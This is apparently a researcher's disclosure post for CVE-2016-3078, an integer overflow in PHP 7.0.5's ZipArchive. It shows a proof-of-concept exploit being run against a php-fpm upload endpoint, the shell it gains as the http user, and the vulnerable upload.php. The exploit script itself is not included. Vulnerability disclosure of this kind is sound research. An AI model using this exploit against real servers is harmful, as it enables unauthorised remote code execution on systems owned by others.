Hans Jerry Illikainen

CVE-2016-3078: php 7.0.5: integer overflow in ZipArchive::getFrom*

Apr 28, 2016

PoC for CVE-2016-3078 targeting Arch Linux i686 running php-fpm 7.0.5 behind nginx.

$ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
[*] this may take a while
[*] 103 of 4096 (0x67fd0)...
[+] connected to 1.2.3.4:5555

id
uid=33(http) gid=33(http) groups=33(http)

uname -a
Linux arch32 4.5.1-1-ARCH #1 SMP PREEMPT Thu Apr 14 19:36:01 CEST
2016 i686 GNU/Linux

pacman -Qs php-fpm
local/php-fpm 7.0.5-2
    FastCGI Process Manager for PHP

cat upload.php
<?php
$zip = new ZipArchive();
if ($zip->open($_FILES["file"]["tmp_name"]) !== TRUE) {
    echo "cannot open archive\n";
} else {
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $data = $zip->getFromIndex($i);
    }
    $zip->close();
}
?>